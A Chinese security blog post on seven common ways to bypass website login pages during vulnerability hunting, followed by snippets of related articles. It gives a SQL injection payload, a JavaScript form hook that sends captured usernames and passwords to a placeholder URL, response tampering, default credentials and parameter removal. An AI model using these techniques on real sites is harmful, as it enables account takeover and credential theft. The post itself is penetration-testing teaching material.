干货 | 漏洞挖掘绕过登录页面的七种常见方法

VSole2023-01-11 16:52:21

绕过登录页面的七种常见方法

这篇文章是关于绕过由于网站的弱点而发生的登录页面功能。绕过登录页面功能的方法有很多,但在本文中,我们将讨论一些常见的方法。那么让我们开始吧……

常见的七种方式

绕过 SQL 注入

通过跨站点脚本(XSS)

通过操纵响应返回包

绕过爆破攻击限制

绕过目录爆破攻击

默认凭据绕过

通过删除请求中的参数

绕过 SQL 注入

我以 Mutillidae 为例进行演示。

所以现在我们可以将 SQL 注入payload放入其中。对于这个语法错误,payload是“ ' or 1=1--” 现在让我们看看输入它时会发生什么。

呜呜!!我们以管理员身份登录。在您的情况下,当它不起作用时尝试其他payload,并使用 SQLMap 工具dump用户名和密码。

通过跨站点脚本(XSS)

输入 xss payload alert(1) 并显示弹出窗口,因此您可以通过 XSS 尝试 CSRF 并查看受害者凭据。这是它的 CSRF payload

<br>function intercept() {<br> <br> var user = document.forms[0].elements[0].value;<br> var pass = document.forms[0].elements[1].value;<br> <br> <br> var xhr = new XMLHttpRequest();<br> <br> xhr.open("GET", "https://your-target-url?username/email="+user+"&password="+pass)<br> xhr.send();<br>return false;<br> }<br> document.forms[0].onsubmit = intercept;<br> <br>

从 HTTPS 登录页面窃取密码并使用反射 XSS 绕过 CSRF 保护

https://medium.com/dark-roast-security/password-stealing-from-https-login-page-and-csrf-bypass-with-reflected-xss-76f56ebc4516

通过操纵响应返回包

该方法主要基于Response Status代码操作和Response Body操作。

首先在你的目标上创建一个帐户,然后使用正确的凭据登录并拦截 burp suite中的请求并分析响应,然后你尝试使用错误的凭据登录并使用正确的凭据操作你看到的响应,例如

403 Forbidden

{"error":true, "message":"Invalid Token"}
200 OK

{"success":true}

如果存在此漏洞,你将立即登录进去。

绕过爆破攻击限制

这种攻击主要发生在站点没有设置时间限制和重复次数限制,基本上没有在登录页面设置延时功能的情况下。

当您反复输入错误的凭据时,网站会显示 5 分钟后输入凭据的时间。当站点显示这种错误时,很难执行此方法。我写了一篇关于暴力攻击的文章,下面给出了它的链接,看看它是如何进行这种攻击的。

如何使用 Burp Suite 执行登录暴力破解

https://medium.com/@uttamgupta_/1-how-to-perform-login-brute-force-using-burp-suite-9d06b67fb53d

绕过爆破IP限制

https://medium.com/@uttamgupta_/broken-brute-force-protection-ip-block-aae835895a74

绕过目录模糊攻击

在这种方法中,我们尝试借助一些工具(如 ffuf、dirbuster 和 burp suite intruder 等)进行目录暴力破解。大多数工具都有自己的目录词表,但当它没有词表时,所以在 linux 中它有自己的词表,你可以使用它们适用于 Windows,您可以在谷歌上搜索。

在这种攻击中,工具可以找到显示有用响应的任何目录或子目录,或者打开任何仅在您登录站点时打开的页面。我在这个博客中使用了 FFUF 工具,您可以看到它是如何工作的。

子域枚举——如何找到任何域的子域

https://medium.com/@uttamgupta_/subdomain-enumeration-how-to-find-subdomains-of-any-domain-37c989e43ffa

默认凭据绕过

当开发人员创建站点时,他会创建一些用于测试的默认凭据,但很多时候他会删除它,或者很多时候他不会将其从记录中删除。

当站点允许输入任何密码时,许多用户可以输入弱密码并且站点接受它。因此,您应该尝试使用默认凭据。默认凭据列表在 Google 上变得很容易获得。默认凭据,

如 admin:admin、admin:password、username:pass12345 等。

通过删除请求中的参数

当您输入错误的凭据时,网站会显示错误,例如用户名和密码不正确/不匹配,此用户名的密码不正确等,网站会显示此类响应,因此可以尝试此方法。

首先拦截请求并删除请求中的密码参数并转发请求。然后服务器发现该用户名可用并让您登录该站点。

当服务器没有正确分析请求时会出现此问题。

漏洞挖掘https
本作品采用《CC 协议》,转载必须注明作者和本文链接
今天分享的主题是开源软件漏洞挖掘实践,主要讲对于企业项目、开源项目审计的认识以及做代码审计的经验。
前言今天总结Android APP四大组件中Content Provider挖掘的知识,主要分为两个部分,一部分是对Android Content Provider内容提供器的原理总结,另一部分便是对Android provider机制常见的一些漏洞总结,包括一些已知的漏洞方法,和一部分案例实践。
主要就是api接口或者是数据的修改。挖掘流程我们首先在领取优惠卷的地方进行抓包。箭头所指的就是优惠劵类别。此时我们可以去查看一些赠送优惠券的商品,进行抓包。那么此时我们将该编码放在我们上一个数据包中进行重放,发现是可以成功重放并且进行多次重放。此时就已经成功完成了优惠券的无限领取。此时重放了10次,全部成功。该漏洞已经提交修复了。
看雪论坛作者ID:随风而行aa
安服工程师技能手册详细总结
0x02 挖掘前期一、CMS选择如果你是第一次挖白盒漏洞,那么建议你像我一样,先找一些简单的来挖掘
0x01 确定目标无目标随便打,有没有自己对应的SRC应急响应平台不说,还往往会因为一开始没有挖掘漏洞而随意放弃,这样往往不能挖掘到深层次的漏洞。所以在真的想要花点时间在SRC漏洞挖掘上的话,建议先选好目标。0x02 确认测试范围前面说到确定测什么SRC,那么下面就要通过一些方法,获取这个SRC的测试范围,以免测偏。
漏洞挖掘工具—afrog
2023-03-20 10:20:07
-t http://example.com -o result.html2、扫描多个目标 afrog -T urls.txt -o result.html例如:urls.txthttp://example.comhttp://test.comhttp://github.com3、测试单个 PoC 文件 afrog?-t http://example.com -P ./testing/poc-test.yaml -o result.html4、测试多个 PoC 文件 afrog?
VSole
网络安全专家